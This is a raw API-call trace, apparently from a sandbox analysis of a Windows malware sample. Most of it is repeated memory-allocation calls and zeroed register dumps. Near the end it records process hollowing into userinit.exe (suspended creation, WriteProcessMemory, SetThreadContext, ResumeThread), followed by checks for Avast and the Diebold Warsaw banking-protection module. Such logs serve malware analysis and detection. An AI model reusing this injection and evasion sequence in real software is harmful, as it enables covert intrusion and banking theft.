[0096.807] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0096.807] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.808] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.808] GlobalUnlock (hMem=0x95000c) returned 0
[0096.808] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0096.808] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.809] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.809] GlobalUnlock (hMem=0x95000c) returned 0
[0096.809] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0096.809] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.810] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.810] GlobalUnlock (hMem=0x95000c) returned 0
[0096.810] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0096.810] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.811] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.811] GlobalUnlock (hMem=0x95000c) returned 0
[0096.811] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0096.811] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.812] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.812] GlobalUnlock (hMem=0x95000c) returned 0
[0096.812] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0096.812] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.813] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.813] GlobalUnlock (hMem=0x95000c) returned 0
[0096.813] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0096.813] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.814] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.814] GlobalUnlock (hMem=0x95000c) returned 0
[0096.814] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0096.814] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.815] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.815] GlobalUnlock (hMem=0x95000c) returned 0
[0096.815] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0096.815] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.816] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.816] GlobalUnlock (hMem=0x95000c) returned 0
[0096.816] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0096.816] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.817] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.817] GlobalUnlock (hMem=0x95000c) returned 0
[0096.817] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0096.817] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.817] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.818] GlobalUnlock (hMem=0x95000c) returned 0
[0096.818] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0096.818] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.818] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.818] GlobalUnlock (hMem=0x95000c) returned 0
[0096.819] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0096.819] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.819] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.819] GlobalUnlock (hMem=0x95000c) returned 0
[0096.819] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0096.819] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.820] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.820] GlobalUnlock (hMem=0x95000c) returned 0
[0096.820] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0096.820] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.821] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.821] GlobalUnlock (hMem=0x95000c) returned 0
[0096.821] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0096.821] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.822] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.822] GlobalUnlock (hMem=0x95000c) returned 0
[0096.822] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0096.822] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.823] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.823] GlobalUnlock (hMem=0x95000c) returned 0
[0096.823] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0096.823] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.824] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.824] GlobalUnlock (hMem=0x95000c) returned 0
[0096.824] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0096.824] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.825] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0xec, hThread=0xf0, dwProcessId=0xf74, dwThreadId=0xf78)) returned 1
[0096.828] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0096.828] GetThreadContext (in: hThread=0xf0, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0xe72be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x22fc68, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0096.869] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x7ffd5008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0096.869] VirtualAllocEx (hProcess=0xec, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0096.870] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1890000
[0096.870] VirtualAlloc (lpAddress=0x1890000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x1890000
[0096.871] VirtualAlloc (lpAddress=0x1854000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x1854000
[0096.877] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x400000, lpBuffer=0x1853210*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1853210*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0096.890] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x7ffd5008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0096.890] SetThreadContext (hThread=0xf0, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x22fc68, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0096.890] ResumeThread (hThread=0xf0) returned 0x1
[0096.890] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0096.890] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.890] GlobalUnlock (hMem=0x95000c) returned 0
[0096.890] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0096.890] GlobalUnlock (hMem=0x950004) returned 0
[0096.897] Sleep (dwMilliseconds=0xe74e)
[0106.900] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0106.900] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0106.900] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0106.901] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
